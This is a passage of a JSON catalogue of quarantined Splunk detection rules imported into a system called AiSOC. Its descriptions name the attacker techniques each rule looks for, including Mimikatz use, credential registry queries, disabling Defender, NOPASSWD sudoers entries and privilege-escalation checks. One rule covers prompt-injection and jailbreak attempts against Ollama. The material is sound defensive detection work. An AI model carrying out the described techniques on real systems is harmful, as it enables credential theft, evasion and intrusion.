federation backdoor technique, allowing an adversary to establish persistence. If confirmed malicious, the attacker could impersonate any user, bypassing password and MFA requirements, potentially leading to unauthorized access and control over the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a87cd633-076d-4ab2-9047-977751a3c1a0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_federated_domain_added.yml" } }, { "id": "splunk-security-content-a8b3124e-2278-4b73-ae9c-585117079fb2", "type": "detection", "name": "Windows Credentials in Registry Reg Query", "description": "The following analytic identifies processes querying the registry for potential passwords or credentials. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that access specific registry paths known to store sensitive information. This activity is significant as it may indicate credential theft attempts, often used by adversaries or post-exploitation tools like winPEAS. If confirmed malicious, this behavior could lead to privilege escalation, persistence, or lateral movement within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-in-registry-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a8b3124e-2278-4b73-ae9c-585117079fb2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_in_registry_reg_query.yml" } }, { "id": "splunk-security-content-a9079b18-1633-11ec-859c-acde48001122", "type": "detection", "name": "Check Elevated CMD using whoami", "description": "The following analytic identifies the execution of the \"whoami\" command with the \"/group\" flag, where the results are passed to the \"find\" command in order to look for a the string \"12288\". This string represents the SID of the group \"Mandatory Label\\High Mandatory Level\" effectively checking if the current process is running as a \"High\" integrity process or with Administrator privileges. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because it is commonly used by attackers, such as FIN7, to perform reconnaissance on a compromised host. If confirmed malicious, this behavior could indicate an attacker is assessing their privilege level, potentially leading to further privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/check-elevated-cmd-using-whoami.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9079b18-1633-11ec-859c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/check_elevated_cmd_using_whoami.yml" } }, { "id": "splunk-security-content-a9126f73-9a9b-493d-96ec-0dd06695490d", "type": "detection", "name": "Azure AD Concurrent Sessions From Different Ips", "description": "The following analytic detects an Azure AD account with concurrent sessions originating from multiple unique IP addresses within a 5-minute window. It leverages Azure Active Directory NonInteractiveUserSignInLogs to identify this behavior by analyzing successful authentication events and counting distinct source IPs. This activity is significant as it may indicate session hijacking, where an attacker uses stolen session cookies to access corporate resources from a different location. If confirmed malicious, this could lead to unauthorized access to sensitive information and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9126f73-9a9b-493d-96ec-0dd06695490d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-a913718a-25b6-11ec-96d3-acde48001122", "type": "detection", "name": "Rundll32 Shimcache Flush", "description": "The following analytic detects the execution of a suspicious rundll32 command line used to clear the shim cache. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because clearing the shim cache is an anti-forensic technique aimed at evading detection and removing forensic artifacts. If confirmed malicious, this action could hinder incident response efforts, allowing an attacker to cover their tracks and maintain persistence on the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-shimcache-flush.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a913718a-25b6-11ec-96d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_shimcache_flush.yml" } }, { "id": "splunk-security-content-a93df51e-e612-40b7-a105-33e288160575", "type": "detection", "name": "Windows Routing and Remote Access Service Registry Key Change", "description": "This analytic identifies the modification of the Windows RemoteAccess Registry Entry.\nThis technique can be used by malware, adversaries, threat actors and red teamers to gain persistence on a system by tampering with the key to add a custom DLL to be loaded.\nThis technique was also observed to be used by Gh0st RAT malware.\nUpon seeing this behavior, it is recommended to review the system services events especially the remote access services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-routing-and-remote-access-service-registry-key-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a93df51e-e612-40b7-a105-33e288160575", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_routing_and_remote_access_service_registry_key_change.yml" } }, { "id": "splunk-security-content-a9a1da02-8e27-4bf7-a348-f4389c9da487", "type": "detection", "name": "GetAdComputer with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdComputer` PowerShell commandlet using PowerShell Script Block Logging (EventCode=4104). This detection leverages script block text to identify when this commandlet is run. The `Get-AdComputer` commandlet is significant as it can be used by adversaries to enumerate all domain computers, aiding in situational awareness and Active Directory discovery. If confirmed malicious, this activity could allow attackers to map the network, identify targets, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadcomputer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9a1da02-8e27-4bf7-a348-f4389c9da487", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadcomputer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-a9e0d6d3-9676-4e26-994d-4e0406bb4467", "type": "detection", "name": "Windows Mimikatz Binary Execution", "description": "The following analytic identifies the execution of the native mimikatz.exe binary on Windows systems, including instances where the binary is renamed. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because Mimikatz is a widely used tool for extracting authentication credentials, posing a severe security risk. If confirmed malicious, this activity could allow attackers to obtain sensitive credentials, escalate privileges, and move laterally within the network, leading to potential data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mimikatz-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9e0d6d3-9676-4e26-994d-4e0406bb4467", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mimikatz_binary_execution.yml" } }, { "id": "splunk-security-content-a9e5c5db-db11-43ca-86a8-c852d1b2c0ec", "type": "detection", "name": "Common Ransomware Extensions", "description": "The following analytic detects modifications to files with extensions commonly associated with ransomware. It leverages the Endpoint.Filesystem data model to identify changes in file extensions that match known ransomware patterns. This activity is significant because it suggests an attacker is attempting to encrypt or alter files, potentially leading to severe data loss and operational disruption. If confirmed malicious, this activity could result in the encryption of critical data, rendering it inaccessible and causing significant damage to the organization's data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/common-ransomware-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9e5c5db-db11-43ca-86a8-c852d1b2c0ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/common_ransomware_extensions.yml" } }, { "id": "splunk-security-content-aa049566-f76a-43b9-908c-3c27e079fd43", "type": "detection", "name": "Linux Docker Root Directory Mount", "description": "This detection identifies Docker containers that mount the host's root directory into the container filesystem.\nMounting the entire host root directory into a container effectively grants the container visibility and potential write access to all files on the host system.\nIf the container is running as root or with elevated capabilities (e.g., --privileged), the risk is significantly increased.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-docker-root-directory-mount.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa049566-f76a-43b9-908c-3c27e079fd43", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_docker_root_directory_mount.yml" } }, { "id": "splunk-security-content-aa0c4aeb-5b18-41c4-8c07-f1442d7599df", "type": "detection", "name": "Child Processes of Spoolsv exe", "description": "The following analytic identifies child processes spawned by spoolsv.exe, the Print Spooler service in Windows, which typically runs with SYSTEM privileges. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. Monitoring this activity is crucial as it can indicate exploitation attempts, such as those associated with CVE-2018-8440, which can lead to privilege escalation. If confirmed malicious, attackers could gain SYSTEM-level access, allowing them to execute arbitrary code, escalate privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/child-processes-of-spoolsv-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa0c4aeb-5b18-41c4-8c07-f1442d7599df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/child_processes_of_spoolsv_exe.yml" } }, { "id": "splunk-security-content-aa1748dd-4a5c-457a-9cf6-ca7b4eb711b3", "type": "detection", "name": "Linux SSH Remote Services Script Execute", "description": "The following analytic detects the use of SSH to move laterally and execute a script or file on a remote host. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific SSH command-line parameters and URLs. This activity is significant as it may indicate an attacker attempting to execute remote commands or scripts, potentially leading to unauthorized access or control over additional systems. If confirmed malicious, this could result in lateral movement, privilege escalation, or the execution of malicious payloads, compromising the security of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ssh-remote-services-script-execute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa1748dd-4a5c-457a-9cf6-ca7b4eb711b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ssh_remote_services_script_execute.yml" } }, { "id": "splunk-security-content-aa19e627-d448-4a31-85cd-82068dec5691", "type": "detection", "name": "Zscaler Virus Download threat blocked", "description": "The following analytic identifies attempts to download viruses that were blocked by Zscaler within a network. It leverages web proxy logs to detect blocked actions indicative of virus download attempts. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant as it helps in early detection and remediation of potential virus threats, enhancing network security. If confirmed malicious, this activity could indicate an attempt to compromise the network, potentially leading to data breaches or further malware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-virus-download-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa19e627-d448-4a31-85cd-82068dec5691", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_virus_download_threat_blocked.yml" } }, { "id": "splunk-security-content-aa4f695a-3024-11ec-9987-acde48001122", "type": "detection", "name": "Disable Defender AntiVirus Registry", "description": "The following analytic detects the modification of Windows Defender registry settings to disable antivirus and antispyware protections. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with Windows Defender policies. This activity is significant because disabling antivirus protections is a common tactic used by adversaries to evade detection and maintain persistence on compromised systems. If confirmed malicious, this action could allow attackers to execute further malicious activities undetected, leading to potential data breaches, system compromise, and further propagation of malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-antivirus-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa4f695a-3024-11ec-9987-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_antivirus_registry.yml" } }, { "id": "splunk-security-content-aa73f80d-d728-4077-b226-81ea0c8be589", "type": "detection", "name": "Script Execution via WMI", "description": "The following analytic detects the execution of scripts via Windows Management Instrumentation (WMI) by monitoring the process 'scrcons.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. WMI-based script execution is significant because adversaries often use it to perform malicious activities stealthily, such as system compromise, data exfiltration, or establishing persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain long-term access to the environment. Analysts should differentiate between legitimate administrative use and potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/script-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa73f80d-d728-4077-b226-81ea0c8be589", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/script_execution_via_wmi.yml" } }, { "id": "splunk-security-content-aac5df6f-9151-4da6-bdb2-5691aa6e376f", "type": "detection", "name": "Ollama Suspicious Prompt Injection Jailbreak", "description": "Detects potential prompt injection or jailbreak attempts against Ollama API endpoints by identifying requests with abnormally long response times. Attackers often craft complex, layered prompts designed to bypass AI safety controls, which typically result in extended processing times as the model attempts to parse and respond to these malicious inputs. This detection monitors /api/generate and /api/chat endpoints for requests exceeding 30 seconds, which may indicate sophisticated jailbreak techniques, multi-stage prompt injections, or attempts to extract sensitive information from the model.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-suspicious-prompt-injection-jailbreak.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aac5df6f-9151-4da6-bdb2-5691aa6e376f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_suspicious_prompt_injection_jailbreak.yml" } }, { "id": "splunk-security-content-aae66dc0-74b4-4807-b480-b35f8027abb4", "type": "detection", "name": "Linux Auditd Add User Account", "description": "The following analytic detects the creation of new user accounts on Linux systems using commands like \"useradd\" or \"adduser.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries often create new user accounts to establish persistence on compromised hosts. If confirmed malicious, this could allow attackers to maintain access, escalate privileges, and further compromise the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-add-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aae66dc0-74b4-4807-b480-b35f8027abb4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_add_user_account.yml" } }, { "id": "splunk-security-content-ab1e0d52-624a-11ec-8e0b-acde48001122", "type": "detection", "name": "Linux NOPASSWD Entry In Sudoers File", "description": "The following analytic detects the addition of NOPASSWD entries to the /etc/sudoers file on Linux systems. It leverages Endpoint Detection and Response (EDR) telemetry to identify command lines containing \"NOPASSWD:\". This activity is significant because it allows users to execute commands with elevated privileges without requiring a password, which can be exploited by adversaries to maintain persistent, privileged access. If confirmed malicious, this could lead to unauthorized privilege escalation, persistent access, and potential compromise of sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-nopasswd-entry-in-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab1e0d52-624a-11ec-8e0b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_nopasswd_entry_in_sudoers_file.yml" } }, { "id": "splunk-security-content-ab3bcce0-a105-11eb-973c-acde48001122", "type": "detection", "name": "Wermgr Process Create Executable File", "description": "The following analytic detects the wermgr.exe process creating an executable file. It leverages Sysmon EventCode 11 to identify instances where wermgr.exe generates a .exe file. This behavior is unusual because wermgr.exe is typically associated with error reporting, not file creation. Such activity is significant as it may indicate TrickBot malware, which injects code into wermgr.exe to execute malicious actions like downloading additional payloads. If confirmed malicious, this could lead to further malware infections, data exfiltration, or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-create-executable-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab3bcce0-a105-11eb-973c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wermgr_process_create_executable_file.yml" } }, { "id": "splunk-security-content-ab59d5ee-8694-4832-a332-cefcf66a9057", "type": "detection", "name": "Cisco Duo Policy Skip 2FA for Other Countries", "description": "The following analytic detects when a Duo policy is created or updated to allow access without two-factor authentication (2FA)\nfor users in countries other than the default. It identifies this behavior by searching Duo administrator activity logs for policy\ncreation or update actions where the policy description indicates that access is permitted without 2FA for certain user locations.\nThis is achieved by parsing the relevant fields in the logs and filtering for the specific condition of 'Allow access without 2FA.'\nThis behavior is significant for a Security Operations Center (SOC) because bypassing 2FA for any user group or location weakens\nthe organization's security posture and increases the risk of unauthorized access. Attackers or malicious insiders may exploit\nsuch policy changes to circumvent strong authentication controls, potentially leading to account compromise, data breaches, or\nlateral movement within the environment. Early detection of these policy modifications enables the SOC to investigate and respond\nbefore attackers can leverage the weakened controls, thereby reducing the risk and impact of a successful attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-skip-2fa-for-other-countries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab59d5ee-8694-4832-a332-cefcf66a9057", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_skip_2fa_for_other_countries.yml" } }, { "id": "splunk-security-content-ab73289e-2246-4de0-a14b-67006c72a893", "type": "detection", "name": "Windows ClipBoard Data via Get-ClipBoard", "description": "The following analytic detects the execution of the PowerShell command 'Get-Clipboard' to retrieve clipboard data. It leverages PowerShell Script Block Logging (EventCode 4104) to identify instances where this command is used. This activity is significant because it can indicate an attempt to steal sensitive information such as usernames, passwords, or other confidential data copied to the clipboard. If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, potentially compromising user accounts and other critical assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-clipboard-data-via-get-clipboard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab73289e-2246-4de0-a14b-67006c72a893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_clipboard_data_via_get_clipboard.yml" } }, { "id": "splunk-security-content-ab75dbb7-c3ba-4689-9c1b-8d2717bdcba1", "type": "detection", "name": "Linux Sqlite3 Privilege Escalation", "description": "The following analytic detects the execution of the sqlite3 command with elevated privileges, which can be exploited for privilege escalation. It leverages Endpoint Detection and Response (EDR) telemetry to identify instances where sqlite3 is used in conjunction with shell commands and sudo. This activity is significant because it indicates a potential attempt to gain root access, which could lead to full system compromise. If confirmed malicious, an attacker could execute arbitrary commands as root, leading to unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sqlite3-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ab75dbb7-c3ba-4689-9c1b-8d2717bdcba1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sqlite3_privilege_escalation.yml" } }, { "id": "splunk-security-content-abf39464-ed43-4d69-a56c-02750032a3fb", "type": "detection", "name": "Cisco Duo Policy Deny Access", "description": "The following analytic identifies instances where a Duo administrator creates or updates a policy to explicitly deny user access within the Duo environment. It detects this behavior by searching Duo administrator activity logs for policy creation or update actions where the authentication status is set to \"Deny access.\" By correlating these events with user and admin details, the analytic highlights potential misuse or malicious changes to access policies. This behavior is critical for a SOC to monitor, as unauthorized or suspicious denial of access policies can indicate insider threats, account compromise, or attempts to disrupt legitimate user access. The impact of such an attack may include denial of service to critical accounts, disruption of business operations, or the masking of further malicious activity by preventing targeted users from accessing resources. Early detection enables rapid investigation and remediation to maintain organizational security and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-deny-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "abf39464-ed43-4d69-a56c-02750032a3fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_deny_access.yml" } }, { "id": "splunk-security-content-abfb7cc5-c275-4a97-9029-62cd8d4ffeca", "type": "detection", "name": "Windows System Network Connections Discovery Netsh", "description": "The following analytic detects the execution of the Windows built-in tool netsh.exe to display the state, configuration, and profile of the host firewall. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. Monitoring this activity is crucial as netsh.exe can be used by adversaries to bypass firewall rules or discover firewall settings. If confirmed malicious, this activity could allow attackers to manipulate firewall configurations, potentially leading to unauthorized network access or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-network-connections-discovery-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "abfb7cc5-c275-4a97-9029-62cd8d4ffeca", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_network_connections_discovery_netsh.yml" } }, { "id": "splunk-security-content-ac30858b-7c25-4f0a-a7fa-bef036e49dc3", "type": "detection", "name": "Windows Execution of Microsoft MSC File In Suspicious Path", "description": "The following analytic detects when a Microsoft Management Console (MMC) process executes an .msc file in a suspicious path on a Windows system. While .msc files are legitimate components used for system administration, unexpected execution of these files by non-administrative processes or in unusual contexts can indicate malicious activity, such as living-off-the-land attacks, persistence mechanisms, or automated administrative abuse. This detection monitors process creation events, command-line arguments, and parent process relationships to help distinguish normal administrative usage from potential threats. Alerts should be investigated in the context of the process initiating the .msc file, the 